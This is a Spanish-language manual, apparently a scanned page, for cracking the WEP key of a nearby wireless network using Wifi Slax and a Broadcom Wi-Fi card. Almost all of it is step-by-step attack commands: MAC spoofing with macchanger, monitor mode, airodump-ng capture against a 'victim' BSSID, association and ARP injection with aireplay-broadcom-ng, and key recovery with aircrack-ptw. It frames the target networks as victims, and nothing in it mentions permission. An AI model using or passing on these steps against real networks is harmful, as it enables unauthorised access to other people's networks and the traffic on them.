You are on page 1of 5

Hola amigos ahora les traigo el manual de Wifi Slax 3.

1 pero ahora para


crackear con una tarjeta o USB Wifi inalámbrica que tiene “CHIP
BROADCOM”. Tomen en cuenta que cualquier palabra o texto que este en
este manual entre comillas o paréntesis es solo para ser específicos y no
significa que tienen que poner las comillas o los paréntesis. Lo primero que
tenemos que hacer es lo siguiente:

1
1.- Cambiar nuestra MAC por una MAC FALSA, ¿Cómo lo hacemos?

Abrimos una “Shell” y escribimos el siguiente comando

“ifconfig eth0 down” (demos enter)

Este comando es para apagar la interfaz

Ahora escribimos el siguiente comando:

macchanger –m 00:11:22:33:44:55 eth0

Pondremos nuestra tarjeta en modo monitor con el siguiente comando,


2 abrimos una “Shell” y escribimos el siguiente comando:

iwconfig eth0 mode monitor

En esta misma consola escribimos el siguiente comando:

airodump-ng eth0 (Sin las comillas)


Este comando es para ver las redes que están a nuestro alcance. Vamos a
seleccionar una red. Paramos él proceso que se está ejecutando en esta
ventana con las teclas CTRL + C (Al mismo tiempo las presionamos).

Ahora en una hoja vamos a anotar lo siguiente que es muy importante que lo
tomemos en cuenta:

1.- La BSSID que es la MAC de nuestra víctima.


2.- Lo de la columna CH que es el canal en la que se encuentra la red.
3.- El ESSID que es el nombre de la RED que vamos a crackear

Tenemos que anotar con gran exactitud lo que les indique porque eso lo que
vamos a utilizar.

3 Ahora, en esta misma “Shell Console” escribiremos el siguiente comando:

airodump-ng --bssid 00:1D:5A:C9:3F:F9 -c 1 –w TEST eth0

¿Para qué sirve este comando?

[Comando] [--BSSID de la red a crackear] [-c Numero de canal en que esta la


red][-w (poner cualquier nombre)][Tu interface de red]

El nombre que ponemos después de la –w es muy importante que lo


anotemos por que este será utilizado en el paso Nº 6

4 Abrimos otra Shell y escribiremos el siguiente comando para que nos


asociemos a la red:

aireplay-broadcom-ng –e “Nombre complete de la red” –a “MAC de la RED”


-h 00:11:22:33:44:55 -1 0 eth0
5 Abrimos otra Shell para empezar a inyectar los paquetes que estamos
capturando, ponemos el siguiente comando:

aireplay-broadcom-ng -e “Nombre de la RED” -b “Mac de Nuestra Victima”


–h 00:11:22:33:44:55 eth0

Este comando es para enviar, recibir paquetes y leer los ARP. Aparecerá una
venta asi:
6 Una vez que tengamos 30,000 ARP, haremos el primer intento de crackeo y
abrimos otra “Shell Console” y escribimos el siguiente comando:

aircrack-ptw TEST-01.cap (Le damos enter)

El nombre RED es que utilice yo en el paso 3 pero recuerden que el nombre


es el que ustedes escriben cuando van por el paso numero 3 y que lo tienen
que anotar correctamente, no específicamente puede es este nombre (Ej.
Crack, victima, Wifi,).

Les aparecerá lo siguiente:

Buscando Nueva Tabla

BSSID (Aparecerá la MAC verdadera de nuestra victima =BSSID)

Estadística para BSSID (Aparece otra vez la MAC de la victima)

Keindex=0 Paquete (Muestra los ARP capturados)

Clave encontrada con longitud 05: (Nos aparecerá una clave de 10


Números o Números con letras y esa es la CLAVE DEL MODEM)

***OJO***

Puede ser que les diga que: “No se ha encontrado una clave desea
continuar con aircrack-ng [S, n]” ponga “n” y le dan enter y esperen
que los ARP suban a unos 50,000 o 60,000 e intenten después, aquí
ya crackearan con más seguridad.

You might also like